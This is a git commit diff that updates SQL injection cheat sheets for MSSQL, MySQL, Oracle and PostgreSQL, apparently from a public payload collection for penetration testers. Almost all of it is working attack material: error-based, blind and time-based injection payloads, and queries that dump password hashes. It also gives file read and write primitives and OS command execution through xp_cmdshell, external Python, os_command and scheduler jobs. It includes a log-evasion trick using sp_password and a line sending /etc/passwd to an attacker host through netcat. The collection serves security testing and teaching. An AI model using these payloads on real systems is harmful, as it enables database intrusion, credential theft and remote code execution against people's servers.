SQL - File Manipulation and Error Based Injection

This commit is contained in:
Swissky 2024-11-16 18:49:01 +01:00
parent 9a908a15d2
commit 3c5bab0338
5 changed files with 284 additions and 173 deletions

View File

@ -7,18 +7,19 @@
* [MSSQL Default Databases](#mssql-default-databases) * [MSSQL Default Databases](#mssql-default-databases)
* [MSSQL Comments](#mssql-comments) * [MSSQL Comments](#mssql-comments)
* [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL Enumeration](#mssql-enumeration) * [MSSQL Enumeration](#mssql-enumeration)
* [MSSQL List Databases](#mssql-list-databases) * [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables) * [MSSQL List Tables](#mssql-list-tables)
* [MSSQL List Columns](#mssql-list-columns)
* [MSSQL Union Based](#mssql-union-based) * [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based) * [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent) * [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
* [MSSQL Time Based](#mssql-time-based) * [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked Query](#mssql-stacked-query) * [MSSQL Stacked Query](#mssql-stacked-query)
* [MSSQL File Manipulation](#mssql-file-manipulation)
* [MSSQL Read File](#mssql-read-file) * [MSSQL Read File](#mssql-read-file)
* [MSSQL Write File](#mssql-write-file)
* [MSSQL Command Execution](#mssql-command-execution) * [MSSQL Command Execution](#mssql-command-execution)
* [XP_CMDSHELL](#xp_cmdshell) * [XP_CMDSHELL](#xp_cmdshell)
* [Python Script](#python-script) * [Python Script](#python-script)
@ -29,6 +30,8 @@
* [MSSQL Privileges](#mssql-privileges) * [MSSQL Privileges](#mssql-privileges)
* [MSSQL List Permissions](#mssql-list-permissions) * [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Make User DBA](#mssql-make-user-dba) * [MSSQL Make User DBA](#mssql-make-user-dba)
* [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL OPSEC](#mssql-opsec)
* [References](#references) * [References](#references)
@ -49,31 +52,17 @@
| Type | Description | | Type | Description |
|----------------------------|-----------------------------------| |----------------------------|-----------------------------------|
| `/* MSSQL Comment */` | C-style comment | | `/* MSSQL Comment */` | C-style comment |
| `-- -` | SQL comment | | `--` | SQL comment |
| `;%00` | Null byte | | `;%00` | Null byte |
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
```sql
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
```
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
```sql
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL Enumeration ## MSSQL Enumeration
| Description | SQL Query | | Description | SQL Query |
| ------------- | ----------------------------------------- | | --------------- | ----------------------------------------- |
| DBMS version | `SELECT @@version` | | DBMS version | `SELECT @@version` |
| Database name | `SELECT DB_NAME()` | | Database name | `SELECT DB_NAME()` |
| Database schema | `SELECT SCHEMA_NAME()` |
| Hostname | `SELECT HOST_NAME()` | | Hostname | `SELECT HOST_NAME()` |
| Hostname | `SELECT @@hostname` | | Hostname | `SELECT @@hostname` |
| Hostname | `SELECT @@SERVERNAME` | | Hostname | `SELECT @@SERVERNAME` |
@ -90,6 +79,7 @@
```sql ```sql
SELECT name FROM master..sysdatabases; SELECT name FROM master..sysdatabases;
SELECT name FROM master.sys.databases;
-- for N = 0, 1, 2, … -- for N = 0, 1, 2, …
SELECT DB_NAME(N); SELECT DB_NAME(N);
@ -99,6 +89,25 @@ SELECT DB_NAME(N);
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
``` ```
### MSSQL List Tables
```sql
-- use xtype = 'V' for views
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, table_name FROM information_schema.columns
SELECT table_name FROM information_schema.tables WHERE table_catalog='<DBNAME>'
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
```
### MSSQL List Columns ### MSSQL List Columns
```sql ```sql
@ -109,23 +118,8 @@ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, column_name FROM information_schema.columns SELECT table_catalog, column_name FROM information_schema.columns
```
### MSSQL List Tables SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
```sql
-- use xtype = 'V' for views
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, table_name FROM information_schema.columns
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
``` ```
@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
## MSSQL Error Based ## MSSQL Error Based
| Name | Payload |
| ------------ | --------------- |
| CONVERT | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` |
| IN | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` |
| EQUAL | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` |
| CAST | `CAST((SELECT @@version) AS INT)` |
* For integer inputs * For integer inputs
```sql ```sql
@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
``` ```
## MSSQL Read File ## MSSQL File Manipulation
### MSSQL Read File
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission. **Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
```sql
OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
```
Example:
```sql ```sql
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null -1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
``` ```
### MSSQL Write File
```sql
execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
```
## MSSQL Command Execution ## MSSQL Command Execution
### XP_CMDSHELL ### XP_CMDSHELL
@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
``` ```
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005)
```sql ```sql
EXEC sp_configure 'show advanced options',1; EXEC sp_configure 'show advanced options',1;
@ -282,7 +299,6 @@ RECONFIGURE;
> Executed by a different user than the one using `xp_cmdshell` to execute commands > Executed by a different user than the one using `xp_cmdshell` to execute commands
```powershell ```powershell
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
``` ```
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
```sql
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
```
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
```sql
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL OPSEC ## MSSQL OPSEC
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password` Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`

View File

@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
| `/* MYSQL Comment */` | C-style comment | | `/* MYSQL Comment */` | C-style comment |
| `/*! MYSQL Special SQL */` | Special SQL | | `/*! MYSQL Special SQL */` | Special SQL |
| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 | | `/*!32302 10*/` | Comment for MYSQL version 3.23.02 |
| `-- -` | SQL comment | | `--` | SQL comment |
| `;%00` | Nullbyte | | `;%00` | Nullbyte |
| \` | Backtick | | \` | Backtick |
@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
## MYSQL Error Based ## MYSQL Error Based
| Name | Payload |
| ------------ | --------------- |
| GTID_SUBSET | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` |
| JSON_KEYS | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` |
| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` |
| UPDATEXML | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` |
| EXP | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` |
| OR | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` |
| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
### MYSQL Error Based - Basic ### MYSQL Error Based - Basic
Works with `MySQL >= 4.1` Works with `MySQL >= 4.1`
@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL.
RLIKE SLEEP([SLEEPTIME]) RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR
AND SLEEP(10)=0
AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR)
``` ```
### Using SLEEP in a Subselect ### Using SLEEP in a Subselect
@ -662,12 +675,19 @@ mysql> SELECT @@version;
| 5.6.31-0ubuntu0.15.10.1 | | 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+ +-------------------------+
mysql> mysql> SELECT version(); mysql> SELECT version();
+-------------------------+ +-------------------------+
| version() | | version() |
+-------------------------+ +-------------------------+
| 5.6.31-0ubuntu0.15.10.1 | | 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+ +-------------------------+
mysql> SELECT @@GLOBAL.VERSION;
+------------------+
| @@GLOBAL.VERSION |
+------------------+
| 8.0.27 |
+------------------+
``` ```

View File

@ -7,13 +7,12 @@
* [Oracle SQL Default Databases](#oracle-sql-default-databases) * [Oracle SQL Default Databases](#oracle-sql-default-databases)
* [Oracle SQL Comments](#oracle-sql-comments) * [Oracle SQL Comments](#oracle-sql-comments)
* [Oracle SQL Version](#oracle-sql-version) * [Oracle SQL Enumeration](#oracle-sql-enumeration)
* [Oracle SQL Hostname](#oracle-sql-hostname)
* [Oracle SQL Database Name](#oracle-sql-database-name)
* [Oracle SQL Database Credentials](#oracle-sql-database-credentials) * [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
* [Oracle SQL Methodology](#oracle-sql-methodology)
* [Oracle SQL List Databases](#oracle-sql-list-databases) * [Oracle SQL List Databases](#oracle-sql-list-databases)
* [Oracle SQL List Columns](#oracle-sql-list-columns)
* [Oracle SQL List Tables](#oracle-sql-list-tables) * [Oracle SQL List Tables](#oracle-sql-list-tables)
* [Oracle SQL List Columns](#oracle-sql-list-columns)
* [Oracle SQL Error Based](#oracle-sql-error-based) * [Oracle SQL Error Based](#oracle-sql-error-based)
* [Oracle SQL Blind](#oracle-sql-blind) * [Oracle SQL Blind](#oracle-sql-blind)
* [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent) * [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
@ -22,6 +21,11 @@
* [Oracle SQL Command Execution](#oracle-sql-command-execution) * [Oracle SQL Command Execution](#oracle-sql-command-execution)
* [Oracle Java Execution](#oracle-java-execution) * [Oracle Java Execution](#oracle-java-execution)
* [Oracle Java Class](#oracle-java-class) * [Oracle Java Class](#oracle-java-class)
* [OracleSQL File Manipulation](#OracleSQL-file-manipulation)
* [OracleSQL Read File](#OracleSQL-read-file)
* [OracleSQL Write File](#OracleSQL-write-file)
* [Package os_command](#package-os_command)
* [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs)
* [References](#references) * [References](#references)
@ -35,39 +39,30 @@
## Oracle SQL Comments ## Oracle SQL Comments
| Type | Description | | Type | Comment |
|----------------------------|-----------------------------------| | ------------------- | ------- |
| `-- -` | SQL comment | | Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## Oracle SQL Version ## Oracle SQL Enumeration
```sql | Description | SQL Query |
SELECT user FROM dual UNION SELECT * FROM v$version | ------------- | ------------------------------------------------------------ |
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; | DBMS version | `SELECT user FROM dual UNION SELECT * FROM v$version` |
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; | DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` |
SELECT version FROM v$instance; | DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` |
``` | DBMS version | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;` |
| DBMS version | `SELECT version FROM v$instance;` |
| Hostname | `SELECT UTL_INADDR.get_host_name FROM dual;` |
## Oracle SQL Hostname | Hostname | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;` |
| Hostname | `SELECT UTL_INADDR.get_host_address FROM dual;` |
```sql | Hostname | `SELECT host_name FROM v$instance;` |
SELECT host_name FROM v$instance; (Privileged) | Database name | `SELECT global_name FROM global_name;` |
SELECT UTL_INADDR.get_host_name FROM dual; | Database name | `SELECT name FROM V$DATABASE;` |
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; | Database name | `SELECT instance_name FROM V$INSTANCE;` |
SELECT UTL_INADDR.get_host_address FROM dual; | Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` |
``` | Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;` |
## Oracle SQL Database Name
```sql
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```
## Oracle SQL Database Credentials ## Oracle SQL Database Credentials
@ -79,27 +74,29 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g | | `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
## Oracle SQL List Databases ## Oracle SQL Methodology
### Oracle SQL List Databases
```sql ```sql
SELECT DISTINCT owner FROM all_tables; SELECT DISTINCT owner FROM all_tables;
SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)
``` ```
### Oracle SQL List Tables
## Oracle SQL List Columns
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```
## Oracle SQL List Tables
```sql ```sql
SELECT table_name FROM all_tables; SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables; SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='<DBNAME>'
```
### Oracle SQL List Columns
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='<TABLE_NAME>' AND OWNER='<DBNAME>'
``` ```
@ -115,6 +112,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
| SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` | | SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
| XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` | | XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
| XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` | | XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
| XMLType | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` |
| DBMS_UTILITY | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` |
When the injection point is inside a string use : `'||PAYLOAD--` When the injection point is inside a string use : `'||PAYLOAD--`
@ -141,6 +140,7 @@ When the injection point is inside a string use : `'||PAYLOAD--`
```sql ```sql
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
``` ```
@ -212,6 +212,37 @@ SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roo
``` ```
### Package os_command
```sql
SELECT os_command.exec_clob('<COMMAND>') cmd from dual
```
### DBMS_SCHEDULER Jobs
```sql
DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '<COMMAND>', enabled => TRUE)
```
## OracleSQL File Manipulation
:warning: Only in a stacked query.
### OracleSQL Read File
```sql
utl_file.get_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
```
### OracleSQL Write File
```sql
utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
```
## References ## References
- [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) - [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)

View File

@ -6,12 +6,8 @@
## Summary ## Summary
* [PostgreSQL Comments](#postgresql-comments) * [PostgreSQL Comments](#postgresql-comments)
* [PostgreSQL Version](#postgresql-version)
* [PostgreSQL Current User](#postgresql-current-user)
* [PostgreSQL Privileges](#postgresql-privileges)
* [PostgreSQL List Privileges](#postgresql-list-privileges)
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
* [PostgreSQL Enumeration](#postgresql-enumeration) * [PostgreSQL Enumeration](#postgresql-enumeration)
* [PostgreSQL Methodology](#postgresql-methodology)
* [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL XML Helpers](#postgresql-xml-helpers)
* [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Blind](#postgresql-blind)
@ -27,72 +23,65 @@
* [Using libc.so.6](#using-libcso6) * [Using libc.so.6](#using-libcso6)
* [PostgreSQL WAF Bypass](#postgresql-waf-bypass) * [PostgreSQL WAF Bypass](#postgresql-waf-bypass)
* [Alternative to Quotes](#alternative-to-quotes) * [Alternative to Quotes](#alternative-to-quotes)
* [PostgreSQL Privileges](#postgresql-privileges)
* [PostgreSQL List Privileges](#postgresql-list-privileges)
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
* [References](#references) * [References](#references)
## PostgreSQL Comments ## PostgreSQL Comments
| Type | Comment | | Type | Comment |
| ---- | ------- | | ------------------- | ------- |
| Single-Line Comment | `--` | | Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` | | Multi-Line Comment | `/**/` |
## PostgreSQL Version
```sql
SELECT version()
```
## PostgreSQL Current User
```sql
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
```
## PostgreSQL Privileges
### PostgreSQL List Privileges
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
```sql
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
```
### PostgreSQL Superuser Role
```sql
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```
## PostgreSQL Enumeration ## PostgreSQL Enumeration
| SQL Query | Description | | Description | SQL Query |
| --------------------------------------- | -------------- | | ---------------------- | --------------------------------------- |
| `SELECT current_database()` | Database Name | | DBMS version | `SELECT version()` |
| `SELECT datname FROM pg_database` | List Databases | | Database Name | `SELECT CURRENT_DATABASE()` |
| `SELECT table_name FROM information_schema.tables` | List Tables | | Database Schema | `SELECT CURRENT_SCHEMA()` |
| `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | List Columns | | List PostgreSQL Users | `SELECT usename FROM pg_user` |
| `SELECT usename FROM pg_user` | List PostgreSQL Users | | List Password Hashes | `SELECT usename, passwd FROM pg_shadow` |
| `SELECT usename, passwd FROM pg_shadow` | List Password Hashes | | List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` |
| `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | List Database Administrator Accounts | | Current User | `SELECT user;` |
| Current User | `SELECT current_user;` |
| Current User | `SELECT session_user;` |
| Current User | `SELECT usename FROM pg_user;` |
| Current User | `SELECT getpgusername();` |
## PostgreSQL Methodology
| Description | SQL Query |
| ---------------------- | -------------------------------------------- |
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
| List Databases | `SELECT datname FROM pg_database` |
| List Tables | `SELECT table_name FROM information_schema.tables` |
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
## PostgreSQL Error Based ## PostgreSQL Error Based
| Name | Payload |
| ------------ | --------------- |
| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` |
| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` |
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
| CAST | `AND (SELECT version())::int=1 -- -` |
```sql ```sql
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)
``` ```
```sql ```sql
@ -105,14 +94,14 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
### PostgreSQL XML Helpers ### PostgreSQL XML Helpers
```sql ```sql
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
``` ```
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
```sql ```sql
select database_to_xml(true,true,''); -- dump the current database to XML SELECT database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
``` ```
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
@ -166,6 +155,7 @@ select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end
``` ```
```sql ```sql
AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
``` ```
@ -276,9 +266,9 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
``` ```
### PostgreSQL WAF Bypass ## PostgreSQL WAF Bypass
#### Alternative to Quotes ### Alternative to Quotes
| Payload | Technique | | Payload | Technique |
| ------------------ | --------- | | ------------------ | --------- |
@ -286,6 +276,24 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) | | `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
## PostgreSQL Privileges
### PostgreSQL List Privileges
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
```sql
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
```
### PostgreSQL Superuser Role
```sql
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```
## References ## References
